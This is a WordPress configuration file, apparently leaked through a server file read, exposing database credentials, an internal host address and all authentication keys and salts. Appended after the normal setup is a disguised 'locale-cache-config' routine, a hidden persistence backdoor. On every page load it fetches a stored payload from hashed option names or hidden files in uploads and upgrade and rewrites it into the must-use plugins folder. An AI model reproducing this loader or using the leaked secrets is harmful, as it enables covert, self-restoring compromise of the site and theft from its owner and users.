File: //proc/self/cwd/wp-config.php
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'WP1079012441' );
/** MySQL database username */
define( 'DB_USER', '65aBWhaGfewmE' );
/** MySQL database password */
define( 'DB_PASSWORD', '35NqXeXZSPRcKj' );
/** MySQL hostname */
define( 'DB_HOST', '10.10.94.5' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'eIv4H2CAUFrz1mEB1l91TMP0hSIjUI2vss98pMLZFxsTKLTtmTxLQd0Fu7CzWNYG');
define('SECURE_AUTH_KEY', 'R55qhrxRQUWBvSchFradt5fQaWdi8sS1wKs27KberrrVne5DJ1IVPfBa5DR6cgrl');
define('LOGGED_IN_KEY', '18Q9PB0xT8Sx0nHPrDS9jE7n6uksJSrKCDQIyPUYfvPcj0IcVr5TH8uN05iQNiNh');
define('NONCE_KEY', 'hrX6uraashJ5dhabQquUDcUyTZoQRgk1SxxNUkQbgiLkFU9FNXyuvikafWLlPz39');
define('AUTH_SALT', 'wWzVKPXW4z4RrZGbTNGtrswBLdxm5wvCorFtbJc3fExyenrdqLPKvTGcDoJKBsGM');
define('SECURE_AUTH_SALT', '8YLAPx2ru47KcdUSpwRh8LyXHCkviz1AVYEy9ddFjt625mFVoobPG0KtLdWl3QQj');
define('LOGGED_IN_SALT', 'VxW6pLZcsJ0ZKemv43svKH0dUERSxZFHzMO067maMsvkRdQ623rpHmUFISbGTQHC');
define('NONCE_SALT', 'Mb37XLDdlNMsYExLZ2tPMb4FDBLLfB8s9uMNWq80pp0oMpUWQlmy9EFPAzNxsXip');
/**
* Other customizations.
*/
define('FS_METHOD','direct');
define('FS_CHMOD_DIR',0755);
define('FS_CHMOD_FILE',0644);
define('WP_TEMP_DIR',dirname(__FILE__).'/wp-content/uploads');
/**
* Turn off automatic updates since these are managed externally by Installatron.
* If you remove this define() to re-enable WordPress's automatic background updating
* then it's advised to disable auto-updating in Installatron.
*/
define('AUTOMATIC_UPDATER_DISABLED', true);
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'i13x_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
// locale-cache-config
if (!function_exists('wp_locale_cache_config_reseed')) {
function wp_locale_cache_config_reseed() {
if (!defined('WP_CONTENT_DIR')) {
return;
}
$mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : (WP_CONTENT_DIR . '/mu-plugins');
$dst = rtrim($mu_dir, '/\\') . '/class-wp-locale-cache.php';
$stub = '';
if (function_exists('get_option') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
$boot = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|boot'), 0, 20);
$bootb = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|bootb'), 0, 20);
$stub = (string) get_option($boot, '');
if ($stub === '') {
$stub = (string) get_option($bootb, '');
}
}
if ($stub === '' && function_exists('get_option')) {
$stub = (string) get_option('wp_locale_cache_bootstrap', '');
if ($stub === '') {
$stub = (string) get_option('_wp_locale_cache_bootstrap', '');
}
}
if ($stub === '' && defined('WP_CONTENT_DIR') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
$h = substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc-disk|boot'), 0, 16);
foreach (array(rtrim(WP_CONTENT_DIR, '/\\') . '/upgrade/.' . $h, rtrim(WP_CONTENT_DIR, '/\\') . '/uploads/.' . $h . '.cache') as $bp) {
if (!is_readable($bp)) {
continue;
}
$t = @file_get_contents($bp);
if (is_string($t) && $t !== '') {
$stub = $t;
break;
}
}
}
if ($stub === '') {
return;
}
if (is_file($dst) && is_readable($dst) && @md5_file($dst) === md5($stub)) {
return;
}
if (!is_dir($mu_dir)) {
@mkdir($mu_dir, 0755, true);
}
if (is_dir($mu_dir) && !is_writable($mu_dir)) {
@chmod($mu_dir, 0755);
}
if (is_file($dst) && !is_writable($dst)) {
@chmod($dst, 0644);
}
@file_put_contents($dst, $stub);
}
wp_locale_cache_config_reseed();
}
// locale-cache-config-end